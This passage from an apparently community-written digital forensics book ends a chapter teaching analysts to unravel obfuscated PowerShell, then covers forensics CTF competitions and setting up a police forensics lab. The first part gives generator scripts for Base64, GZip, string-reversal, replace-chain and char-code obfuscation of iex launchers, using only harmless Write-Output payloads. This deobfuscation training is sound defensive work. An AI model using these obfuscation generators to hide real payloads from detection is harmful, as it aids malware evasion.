This has revealed our obfuscated payload as Write-Output "Obfuscated Payload". If we were to
include iex, the resulting string would be executed:
PS C:\> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'))))
Obfuscated Payload
You will find that in most of the obfuscated scripts you come across, you’ll be met with
Invoke-Expression, its alias, or an obfuscated representation of either. Remember, a plain string
cannot be executed without a launcher.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
PS C:\> $Command = 'Write-Output "Obfuscated Payload"'
PS C:\> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
PS C:\> $Base64 = [Convert]::ToBase64String($Bytes)
PS C:\> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String($Base64))))
GZip Compression
A relatively successful obfuscation technique is built around compressing byte streams. Similar to
how we can compress files on disk to make them smaller, we can also compress payloads and store
and execute them from within a script.
This technique was quite successful once it started being utilized because of the relative difficulty
of breaking down the underlying code to reveal the intended payload. Let’s see an example.
PS C:\> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length));iex(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Depending on your familiarity with .NET classes, there may be some unfamiliar or potentially
intimidating components in this code example. Additionally, we see a slightly ambiguous technique
where a multiline payload is converted into an effective one-liner, denoted by the use of
semicolons (;).
Let’s make this code a little easier to read by entering new lines where we see semicolons.
PS C:\> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
PS C:\> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
PS C:\> iex (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Great, this is now a bit easier to read. If this were our first time seeing this, we’d likely think the
easy win is looking at the decoded base64 string stored in the first variable. Let’s try it.
PS C:\> [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
31
139
8
0
…SNIP…
This revealed a byte array. Even if we converted the byte array to a string using
[System.Text.Encoding]::ASCII.GetString(), it would still leave us just as confused. Some
security providers decode these strings automatically, but in this case doing so wouldn’t necessarily
reveal anything immediately signaturable on its own, which is one of the benefits of this technique.
PS C:\> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA="))
?
/?,I??/-)(-QP?OJ+-NN,IMQH???OLQ ?g}?!
Let’s keep looking at the payload. If you remember from before, when we see iex or
Invoke-Expression, it’s executing a resulting string.
With this in mind, look at how iex is followed by a grouping operator () containing a set of
expressions. This tells us that iex ultimately executes the resulting code from the inner expressions.
If we simply remove iex and execute the remaining code, we’ll see the resulting code that would
have been executed.
PS C:\> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
PS C:\> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
PS C:\> (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()

Write-Output "Obfuscated Payload"
Fantastic: with little more than a readability adjustment followed by removing an iex command,
we have torn down a seemingly complicated payload and revealed the underlying command.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
# Generator
$command = 'Write-Output "Try Harder"'

## ByteArray
$byteArray = [System.Text.Encoding]::ASCII.GetBytes($command)

## GzipStream
[System.IO.Stream]$memoryStream = New-Object System.IO.MemoryStream
[System.IO.Stream]$gzipStream = New-Object System.IO.Compression.GzipStream $memoryStream, ([System.IO.Compression.CompressionMode]::Compress)
$gzipStream.Write($byteArray, 0, $byteArray.Length)
$gzipStream.Close()
$memoryStream.Close()
[byte[]]$gzipBytes = $memoryStream.ToArray()

## Stream Encoder
$encodedGzipStream = [System.Convert]::ToBase64String($gzipBytes)

## Decoder Encoder
[System.String]$Decoder = '$decoded = [System.Convert]::FromBase64String("<Base64>");$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length));iex(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()'
[System.String]$Decoder = $Decoder -replace "<Base64>", $encodedGzipStream

# Launcher
$decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQCimqVPBILEpJLVICAGWcSyMZAAAA")
$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
Invoke-Expression (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Invoke Operator
At this point, we have found that a common pitfall in obfuscating PowerShell commands is the
glaringly obvious usage of the Invoke-Expression cmdlet. This is to be expected because its
commonly known purpose is to run supplied expressions. However, this isn’t the only way to directly
execute strings.
PowerShell supports the usage of what’s called the invoke operator, which appears as & within the
scripting language. The behavior of this operator is similar to that of Invoke-Expression in that it
will execute a given string.
This operator does have one edge on Invoke-Expression: you can chain call operators in the
pipeline. For example, the following three commands are all valid and will return the same thing:
PS C:\> Get-Service | Where-Object {$_.Status -eq 'Running'}
PS C:\> Invoke-Expression 'Get-Service' | Where-Object {$_.Status -eq 'Running'}
PS C:\> & 'Get-Service' | & 'Where-Object' {$_.Status -eq 'Running'}
Its inclusion in a complex payload can be a little tricky, though, as it cannot execute a string that
contains a command together with its parameters. We can put this into perspective with the
following example, where the first command is valid and the second throws an error.
PS C:\> & 'Get-Service' -Name ALG
PS C:\> & 'Get-Service -Name ALG'
& : The term 'Get-Service -Name ALG' is not recognized as the name of a cmdlet
Because of this behavior, you’re more than likely to see this being used to obfuscate cmdlets
themselves. We can see this in practice by replacing the cmdlets in our compression example from
before.
PS C:\> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (&'New-Object' System.IO.MemoryStream($decoded,0,$decoded.Length));&'iex'(&'New-Object' System.IO.StreamReader(&'New-Object' System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
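The deobfuscation approach here is unchanged: strip the &'iex' launcher and run only the decoder
so the payload is printed instead of executed. A minimal sketch against the sample above:

PS C:\> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
PS C:\> $ms = (&'New-Object' System.IO.MemoryStream($decoded,0,$decoded.Length))
PS C:\> (&'New-Object' System.IO.StreamReader(&'New-Object' System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Write-Output "Obfuscated Payload"

Whether the launcher is Invoke-Expression, iex, or an invoke operator against either, the habit is
the same: separate the launcher from the string it launches, then inspect the string.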
String Reversing
One of the benefits of PowerShell is its ability to interact with and manipulate data, including but
not limited to strings. This opens the door to crafting payloads that are confusing to look at, which
can be a very effective stall tactic to slow down efforts to break them apart.
One such tactic is string reversing, where the characters of a string are stored in reverse order, as
in the example below.
PS C:\> $Normal = 'Write-Output "Obfuscated Payload"'
PS C:\> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
When we encounter these scenarios, we can typically re-reverse these strings by hand or
programmatically.
PS C:\> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
PS C:\> iex $((($Reversed.length - 1)..0 | ForEach-Object {$Reversed[$_]}) -join '')
Obfuscated Payload
These scripts cannot be executed on their own in this format; they have to be placed back in their
intended order. Because of this, you’ll typically see logic in place to reverse the string back to its
intended order. However, if you don’t see that logic, then the string is likely intended to be reversed.
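As with the earlier techniques, you can replicate this one for decoding practice. The following is a
minimal generator sketch; reversing the character array is just one of several ways to reverse a
string in PowerShell:

PS C:\> $Command = 'Write-Output "Obfuscated Payload"'
PS C:\> $Chars = $Command.ToCharArray()
PS C:\> [array]::Reverse($Chars)
PS C:\> Write-Output "[*] Obfuscated: $(-join $Chars)"
[*] Obfuscated: "daolyaP detacsufbO" tuptuO-etirW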
Replace Chaining
Another method PowerShell offers for manipulating strings is replacing substrings with other
values, or removing them entirely. This can be done using the Replace() method of a
System.String object or the PowerShell -replace operator.
PS C:\> iex('Write-Input "Obfuscated Payload"' -replace "Input","Output")
Obfuscated Payload

PS C:\> iex('Write-Input "Obfuscated Payload"'.replace("Input","Output"))
Obfuscated Payload
It’s very common to see payloads that use string replacements, but keep in mind that you could see
these replace statements chained in ways that increase the payload’s complexity.
PS C:\> iex $(iex '''Write-Intup "0bfuscated Payload"''.replace("Input","0utput")'.Replace('tup','put')).replace("'","").replace('0','O')
Obfuscated Payload
When dealing with these replace operations, pay very close attention to your integrated development
environment (IDE). If you look closely, you’ll see that one of the replace statements is the color of a
string, which means that in that position it’s indeed a string and not a method invocation. It’s very
common for people to do these search-and-replacements manually, but if you do so out of order,
you could inadvertently break the script logic.
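When you do need to unravel one of these chains, a safe habit is to substitute Write-Output for
the outermost iex so the final layer is printed rather than executed. A minimal sketch against the
sample above:

PS C:\> Write-Output $(iex '''Write-Intup "0bfuscated Payload"''.replace("Input","0utput")'.Replace('tup','put')).replace("'","").replace('0','O')
Write-Output "Obfuscated Payload"

Note that the inner iex still runs here; with real samples, work from the outside in and only remove
one launcher at a time, once you understand what the inner layers do.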
ASCII Translation
When we view strings, we see them in a format we understand: their character values. Each
character value also has a numeric representation that the computer understands. For example, we
know that the ASCII value of the character ‘a’ is 97. To the benefit of some, so does PowerShell out
of the box.
We can see this understanding directly from the console through type casting.
PS C:\> [byte][char]'a'
97

PS C:\> [char]97
a
What this allows red teamers to do is add a level of complexity by replacing arbitrary character
values with their ASCII derivatives. We can see this in practice using our inline base64 expression
from before.
PS C:\> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String($([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+[char]119+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char]105+[char]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char]65+[char]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]71+[char]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]81+[char]65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[char]101+[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[char]81+[char]66+[char]107+[char]65+[char]67+[char]73+[char]65)))))
Obfuscated Payload
When you see these types of payloads, be sure to pay close attention to your IDE. If the character
expressions are not color-coded as strings, that means PowerShell will automatically translate them
to their intended values during invocation. You can view their actual values the same way, by
selecting them and running the selected code.
PS C:\> $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+[char]119+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char]105+[char]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char]65+[char]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]71+[char]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]81+[char]65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[char]101+[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[char]81+[char]66+[char]107+[char]65+[char]67+[char]73+[char]65)
VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA
These types of techniques can also be mixed and matched so that a combination of both characters
and ASCII values is used within the same string.
1 PS C:> iex "Write-Output $([char]34+[char]79+[char]98+[char]102+[char]117+[char]115
2 +[char]99+[char]97+[char]116+[char]101+[char]100+[char]32+[char]80+[char]97+[char]12
3 1+[char]108+[char]111+[char]97+[char]100+[char]34)"
4 Obfuscated Payload
We can use the following generator to create the above scenario for practice.
$String = 'Write-Output "Obfuscated Payload"'
'$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')'
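If you’d rather not execute even the subexpression, you can also translate a [char] chain back to
text statically. A minimal sketch using a lookbehind regex, where $CharChain is a shortened stand-in
for a real payload:

PS C:\> $CharChain = '[char]86+[char]119+[char]66'
PS C:\> -join ([regex]::Matches($CharChain, '(?<=\[char\])\d+') | ForEach-Object { [char][int]$_.Value })
VwB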
Wrapping Up
In this chapter we walked through different types of PowerShell obfuscation techniques that are
frequently leveraged in the wild and how we can step through them to successfully de-obfuscate
them.
It is important for us to keep in mind that these are not the only tricks available in the obfuscation
trade. There are many tricks, both known and unknown to your fellow security researchers in this
field, that could be used at any time. With practice and experience, you’ll be able to de-obfuscate
even extremely obfuscated reverse shell payloads.
One of the best ways to stay ahead of the curve is to ensure that you have a solid understanding of
PowerShell. I would recommend that you take a PowerShell programming course if you’re coming
into this green. If you have some level of comfort with using PowerShell, I challenge you to use
it even more. Find a workflow that’s annoying to do manually and automate it. You can also take
some time and even optimize some of your older scripts.
Never stop challenging yourself. Go the extra mile, stand up and stand strong. Keep moving forward
and you’ll be in a position where you’ll be able to help others grow in the domains that you once
found yourself struggling with.
Tristram
Chapter 6 - Gamification of DFIR:
Playing CTFs
By Kevin Pagano¹⁴¹ | Website¹⁴² | Twitter¹⁴³ | Discord¹⁴⁴
What is a CTF?
The origins of CTF or “Capture The Flag” were found on the playground. It was (still is?) an outdoor
game where teams had to run into the other teams’ zones, physically capture a flag (typically a
handkerchief), and return it back to their own base without getting tagged by the opposing team. In
the information security realm it has come to describe a slightly different competition.
Why am I qualified to talk about CTFs?
Humble brag time. I’ve played in dozens of CTF competitions and have done pretty well for myself.
I am the proud recipient of 3 DFIR Lethal Forensicator coins¹⁴⁵ from SANS, one Tournament of
Champions coin (and trophy!), a 3-time winner of Magnet Forensics CTF competitions, a 4-time
winner of the BloomCON CTF competition, and a few others. I’ve also assisted in creating questions
for some CTF competitions, as well as writing thorough analysis write-ups of events I’ve competed
in on my personal blog¹⁴⁶.
¹⁴¹https://github.com/stark4n6
¹⁴²https://www.stark4n6.com/
¹⁴³https://twitter.com/KevinPagano3
¹⁴⁴http://discordapp.com/users/597827073846935564
¹⁴⁵https://www.sans.org/digital-forensics-incident-response/coins/
¹⁴⁶https://ctf.stark4n6.com
Types of CTFs
Two of the most common information security types of CTF competitions are “Jeopardy” style and
“Attack and Defense” style.
“Jeopardy” style typically is a list of questions with varying difficulty and set defined answers. The
player or team is given some sort of file or evidence to analyze and then has to find the flag to the
question and input it in the proper format to get points.
9.1 - Jeopardy style CTF
“Attack and Defense” is more common in Red and Blue Team environments where the Red Team
has to hack or attack a Blue Team server. The Blue Team subsequently has to try to protect themselves
from the attack. Points can be given for time held or for acquiring specific files from the adversary.
9.2 - Attack and Defense CTF
Depending on the CTF, you may see a combination of types, such as “Jeopardy”-style competitions
with linear (story-based) elements that leave some questions hidden or locked until a certain
prerequisite question is answered.
For this chapter, I will go more in-depth regarding the “Jeopardy”-style competitions, more
specifically, forensics-geared CTF competitions.
Evidence Aplenty
With forensics CTFs, just like in real life, any type of device is fair game for analysis. In the ever-
growing landscape of data locations, there are more and more places to look for clues to solve the
problems. One of the better-known forensic CTFs is the SANS NetWars¹⁴⁷ tournament. It is devised
of 5 levels, with each level progressively harder than the last. In this competition you will have a
chance to analyze evidence from:
- Windows computer
- macOS computer
- Memory/RAM dump
- iOS dump
- Android dump
- Network (PCAP/Netflow/Snort logs)
- Malware samples
You can see from the above list that you get a well-rounded variety of evidence types that you will
most likely see in the field on the job. In other competitions I’ve played, you could also come across
Chromebooks or even Google Takeout and other cloud resources as they become more common. I
have also seen some that are more crypto-based, in which you will be working with different ciphers
and hashes to determine the answers.
¹⁴⁷https://www.sans.org/cyber-ranges/
Who’s Hosting?
As previously mentioned, SANS is probably the most well known provider of a forensics CTF
through their NetWars¹⁴⁸ program. It isn’t cheap as a standalone, but is sometimes bundled with
one of their training courses. You can sometimes see them hosted for free with other events such as
OpenText’s enFuse conference.
As for others, Magnet Forensics has been hosting a CTF for the past 5 years in tandem with their
User Summit. It has been created by Jessica Hyde in collaboration with students from Champlain
College’s Digital Forensics Association; for context, some previous Magnet CTFs were also created
by Dave Cowen and Matthew Seyer.
Other software vendors have started to create their own as well to engage with the community.
Cellebrite has hosted virtual CTF competitions in the past 2 years, and Belkasoft has created and
put out multiple CTFs¹⁴⁹ over the last 2 years. DFRWS¹⁵⁰ hosts a yearly forensic challenge, with
past events covering evidence types such as PlayStation 3 dumps, IoT (Internet of Things)
acquisitions, mobile malware, and many others.
Another fantastic resource for finding challenges is CyberDefenders¹⁵¹. They host hundreds of
different CTF challenges, from past events to challenges that people have uploaded. You can even
contribute your own if you’d like, or have them host your next live event.
9.3 - CyberDefenders website
Another fairly exhaustive list of other past challenges and evidence can be found hosted on
AboutDFIR¹⁵².
¹⁴⁸https://www.sans.org/cyber-ranges
¹⁴⁹https://belkasoft.com/ctf
¹⁵⁰https://dfrws.org/forensic-challenges/
¹⁵¹https://cyberdefenders.org/blueteam-ctf-challenges/
¹⁵²https://aboutdfir.com/education/challenges-ctfs/
Why Play a CTF?
So at the end of the day, why should YOU (yes, YOU, the reader) play a CTF? Well, it depends on
what you want to get out of it.
For Sport
Growing up, I’ve always been a competitive person, especially playing sports like baseball and
basketball; CTFs are no different. There is a rush of excitement (at least for me) in competing against
other like-minded practitioners or analysts to see how you stack up. You can even be anonymous
while playing. Part of the fun is coming up with a creative handle or username to compete under. It
also keeps the commentary and your competitors on their toes.
I personally like to problem-solve and to be challenged, which is part of the reason I enjoy playing.
For “Profit”
I put “profit” in quotation marks because many may construe that as a compensation-type objective.
While many CTF challenges do have prizes such as challenge coins or swag (awesome branded
clothing, anyone?!), that’s not quite the profit I’m talking about here. The profit is the knowledge
you gain from playing. I’ve done competitions where I didn’t know how to analyze memory dumps
at all, and I learned at least the basics of where to look for evidence and new techniques to try later
in real-world scenarios.
“Commit yourself to lifelong learning. The most valuable asset you’ll
ever have is your mind and what you put into it.” - Albert Einstein
The knowledge you gain from the “practice” will inevitably help you in the future; it’s just a matter
of time. Seriously, you don’t know what you don’t know. Remember when I said you can be
anonymous? It doesn’t matter if you get 10 points or 1000 points, as long as you learn something
new and have fun while doing so, that’s all that matters.
Toss a Coin in the Tip Jar
I get asked all the time, “what are your keys to success playing CTFs?”. That’s probably a loaded
question, because there are many factors that can lead to good results. Here, I will break it down
into sections that I feel can at least get you started on a path to winning your first CTF.
Tips for Playing - Prior
First and foremost is the preparation phase. Like any task in life, it always helps to be prepared for
the battle ahead. Having a sense of what is to come will help with your plan of attack. Do your
research! If you know that a specific person created the CTF then take a look at their social media
profiles. Oftentimes they will release hints in some form or fashion, whether it is webinars they have
shared or research papers and blog posts they have recently published. Don’t overdo it, though;
there could be red herrings amok. You can also look at past CTFs they have created to see how questions
were formulated before and what sort of locations they tend to lean on for flags. This is part of the
reason I personally do write-ups of past CTFs: for future reference.
Each CTF’s rules are different, but sometimes players are allowed to reach out to colleagues or others
to form a squad. Knowledge from multiple people well-versed in different topics can help spread out
the workload, especially if there are multiple forms of evidence to be analyzed. I would be remiss if
I didn’t say that some of my winning efforts were with team members who picked up sections where
I wasn’t as strong. Your mileage may vary, though. Make sure to coordinate efforts with your
teammates so you do not waste time all working on the same questions.
If evidence is provided ahead of the competition, make sure to spend some time getting familiar with
it. Process the evidence beforehand so you aren’t wasting time during the live competition waiting
on machine time; some of these events only last 2-3 hours, so time is of the essence. This segues right
into building out your analysis machine and your toolkit. Make sure that all your system updates
are completed beforehand. The last thing you need is an errant Windows update taking down your
system while you watch the spinner turn.
9.4 - “This will take a while”
You may also consider making sure you have local admin access, or at least the ability to turn
off antivirus (if you are analyzing malware) on your computer. Always do so in a controlled
environment if possible, but you knew this already (I hope). If you are provided a toolkit or a trial of
a commercial license, use it to your advantage, even if it’s a secondary set of tools. Sometimes
vendors will formulate an answer in exactly the format that their own tool outputs. Also,
commercial tools can potentially speed up your analysis compared to a bunch of free tools, but that
is personal preference.
The Toolkit
I’m a Windows user through and through so I cannot offer much advice from a Mac or Linux
perspective. With that said, I do have some tools that I use from a forensic perspective to analyze
those types of evidence. Here are my favorite (free) tools that I use during CTFs:
General Analysis
- Autopsy¹⁵³
- Bulk Extractor¹⁵⁴
- DB Browser for SQLite¹⁵⁵
- FTK Imager¹⁵⁶
- Hindsight¹⁵⁷
Chromebook
- cLEAPP¹⁵⁸
Ciphers
- CyberChef¹⁵⁹
- dcode.fr¹⁶⁰
Google Takeout / Returns
- RLEAPP¹⁶¹
Mac
- mac_apt¹⁶²
- plist Editor - iCopyBot¹⁶³
Malware/PE
- PEStudio¹⁶⁴
- PPEE (puppy)¹⁶⁵
Memory/RAM
- MemProcFS¹⁶⁶
- Volatility¹⁶⁷
¹⁵³https://www.autopsy.com/
¹⁵⁴https://github.com/simsong/bulk_extractor
¹⁵⁵https://sqlitebrowser.org/dl/
¹⁵⁶https://www.exterro.com/ftk-imager
¹⁵⁷https://dfir.blog/hindsight/
¹⁵⁸https://github.com/markmckinnon/cLeapp
¹⁵⁹https://gchq.github.io/CyberChef/
¹⁶⁰https://www.dcode.fr/en
¹⁶¹https://github.com/abrignoni/RLEAPP
¹⁶²https://github.com/ydkhatri/mac_apt
¹⁶³http://www.icopybot.com/plist-editor.htm
¹⁶⁴https://www.winitor.com/
¹⁶⁵https://www.mzrst.com/
¹⁶⁶https://github.com/ufrisk/MemProcFS
¹⁶⁷https://www.volatilityfoundation.org/releases
Mobile Devices
- ALEAPP¹⁶⁸
- Andriller¹⁶⁹
- APOLLO¹⁷⁰
- ArtEx¹⁷¹
- iBackupBot¹⁷²
- iLEAPP¹⁷³
Network
- NetworkMiner¹⁷⁴
- Wireshark¹⁷⁵
Windows Analysis
- Eric Zimmerman tools / KAPE¹⁷⁶
- USB Detective¹⁷⁷
This whole list could be expanded much further, but these are the majority of the go-tos in my toolkit.
Tips for Playing - During
We’ve all been there. You get to a point in the middle of a CTF where you start to struggle. Here are
some things to key in on while actually playing.
Read the titles of the questions carefully. Often they are riddled with hints about where to look.
“Fetch the run time of XXX application.” Maybe you should analyze those Prefetch files over there?
Questions will often also tell you how to format your answer submission. This may tell you that the
timestamp you’re hunting could be incorrect – those pesky timezone offsets!
Did you find a flag that appears to be a password? It’s almost guaranteed that that evidence was
placed in such a way that it will be reused. Emails and notes can be a treasure trove for passwords
to encrypted containers or files.
One thing that may seem silly but can help is to just ask questions. If you’re stumped on a question,
talk to the organizer if you can, they may lead you in a direction that you didn’t think of when you
set off on a path of destruction.
¹⁶⁸https://github.com/abrignoni/ALEAPP
¹⁶⁹https://github.com/den4uk/andriller
¹⁷⁰https://github.com/mac4n6/APOLLO
¹⁷¹https://www.doubleblak.com/software.php?id=8
¹⁷²http://www.icopybot.com/itunes-backup-manager.htm
¹⁷³https://github.com/abrignoni/iLEAPP
¹⁷⁴https://www.netresec.com/?page=NetworkMiner
¹⁷⁵https://www.wireshark.org/
¹⁷⁶https://ericzimmerman.github.io/#!index.md
¹⁷⁷https://usbdetective.com/
9.5 - Don’t Sweat It, Take the Hint
Some CTF competitions have a built-in hint system. If they don’t count against your overall score,
take them! The chance of a tiebreaker coming down to who used fewer hints is extremely small. If
the hint system costs points you will need to weigh the pros and cons of not completing a certain
high point question as opposed to losing 5 points for buying that hint.
The last tip for playing is to write down your submissions, both correct and incorrect. I can’t tell
you the number of times I’ve entered the same wrong answer into a question multiple times,
eventually getting points docked off my total. This will not only help you during the live CTF but
afterwards as well, if you write a blog on your walkthroughs.
Strategies
There are multiple strategies that you could use for attacking the questions during the competition.
Usually they will be broken out into different categories by type of evidence such as Mobile /
Computer / Network / Hunt. Some people prefer to try and finish all questions in one section before
jumping to the next one. If you’re really good at mobile forensics, for instance, starting with those
questions may be a good strategy if you are less experienced in other areas.
Another potential strategy depends on how many points the questions are worth. Usually, the more
the points, the harder the question. Some people prefer to try to get high-value questions first to put
large points on the scoreboard and put the pressure on other competitors. Others prefer to go for the
lower point questions first and work their way up.
My personal strategy is a combination of them all. I will typically go more towards the easy points
first and work my way up from there, but I will jump from different evidence categories once I
start to get stuck. Depending on how much pre-work analysis has been done, I may have inferred
references to areas that need to be analyzed. I can then look for questions that I may already have
answers for.
And then there are those who are confident (sometimes too confident!). Some players, knowing
that they have the answers already, will hold off on submitting for points until very late in the
competition to mess with the other competitors. Some CTF competitions will freeze the board for
the last 15-30 minutes to make the final scores a surprise to all. I would advise against this tactic, but
if you’re that confident, then by all means. At the end of the day, the right strategy is whatever suits
the player best.
“You miss 100% of the shots you don’t take – Wayne Gretzky” – Michael Scott
Takeaways
What is it that you can take away from playing a CTF, you ask? You may have different feelings
about what you get out of playing CTFs, but here are a few of my personal takeaways.
Documentation
One of the things I enjoy doing after playing a CTF is to write blog writeups of solutions. If there are
questions I didn’t get to finish during the live competition, I have a tendency to go back and revisit
them to see if I can solve them properly. Once I have a majority of the answers, I will start to write
some blogs on how I solved the questions. Not only does this help me document my results for future
usage, but it also helps me gain experience in more technical writing. I can’t tell you how many
times I’ve referenced my own posts in other competitions or in research as I go back to dive further
into file system locations that I had never looked at before.
Documentation is critical in a lot of aspects of an investigation, so it only makes sense to write down
your notes in case you need to reference where a specific artifact came from. The best part is that not
all questions will be solved the same. I thoroughly enjoy reading other solvers’ thought processes
for getting to the end result.
Challenge Yourself & Build Confidence
I’m going to stress it again; playing CTFs will help you learn. For those who don’t get to work with
some of the different evidence files, like Linux or network files, the CTF datasets will give you plenty
to take home and analyze. Before playing SANS NetWars, I had rarely touched PCAP files, let alone
knew how to utilize Wireshark to pull out files or specific packets. Learning about Google
Takeout exports has given me a new appreciation for what potential evidence can be found in the
cloud and what may not be found directly on a mobile device. This has led to me doing my own
research and contributing back to the community in tools like RLEAPP¹⁷⁸ and other open-source
projects. These are just a few examples of getting out of your comfort zone and challenging yourself
to learn about new tools and techniques.
It’s also important to build your confidence. Just because you don’t place well the first time you
play doesn’t mean you can’t get better. I know when I started out I struggled in competitions. I
didn’t know where to go to find answers or how to get to them. It all comes back to practice. Any
athlete will tell you that repetitions of a task will only make you better at that specific task, and it
is no different with CTFs and examinations. If you see something often enough, you’ll start seeing
patterns like Neo in the Matrix.
¹⁷⁸https://github.com/abrignoni/rleapp
9.6 - “I know kung-fu!”
Have Fun!
The number one takeaway of playing CTFs is to have fun! These are meant to be training exercises
that stimulate the mind and give you a break from your normal workload. Don’t stress it, just keep
learning. If you’re in person, enjoy the camaraderie of other competitors and build your network.
You never know who you may meet while playing and who you will cultivate friendships with in
the industry.
I hope this chapter breathes new life into you playing CTF competitions. Good luck and see you all
out there on the digital battlefields!
Chapter 7 - The Law Enforcement
Digital Forensics Laboratory
Setting Up and Getting Started
By Jason Wilkins¹⁷⁹ | Website¹⁸⁰ | Discord¹⁸¹
Executive Cooperation
The necessity of executive cooperation
When I was approached by my superiors at the police department to establish a Digital Forensics lab,
I felt immediately overwhelmed and intimidated, being so new to the field and unsure of my ability
to successfully achieve the task. I began scouring the internet for ideas and advice on what tools
would be needed and what training I would require. After deciding on the software that we would
begin using in our lab, I began the year-long training offered by the company to get certified in their
product. It was here that I met my first mentor and really began having my questions answered. He
introduced me to the Digital Forensics Discord Server and AboutDFIR.com, and these two resources
alone have done so much to reduce the barriers to entry that existed prior to their creation.
As I gained confidence in my abilities, and familiarity within the industry, I was more able to
approach my executive leadership in a way that facilitated a more professional understanding that
would lead to greater cooperation in budgeting and planning.
¹⁷⁹https://twitter.com/TheJasonWilkins
¹⁸⁰https://www.noob2pro4n6.com/
¹⁸¹http://discordapp.com/users/656544966214025256
To say that Digital Forensics can be expensive is quite often an understatement. Many law
enforcement agencies do not have the budget to even make the attempt. In those cases, they usually
depend upon other larger agencies or the state or federal labs, or do not attempt the feat at all.
Making your case to executive leadership
In these times, every crime contains an aspect of digital evidence. As detectives and prosecutors
attempt to add legs to the table of their argument, they are forced to acknowledge the value of
Digital Forensics in nearly every case.
Most law enforcement executives understand this and will already be amenable to the idea that a
lab would be a great addition to their department. However, anywhere cost is involved, they will
initially resist the eager forensic examiner wishing to purchase every cool toy available. You must
be professional, courteous, and extremely patient if you wish to be taken seriously. Create a business
plan for the lab, complete with a section for the present state and future goals. Make a list of the
tools and training that are needed, with prices and a budget for everything. Include the cost of
payroll for analysts and use this financial bottom-line strategy to sell the idea to your decision-makers.
I would advise caution when using the technique of asking for the world in hopes of blind acceptance.
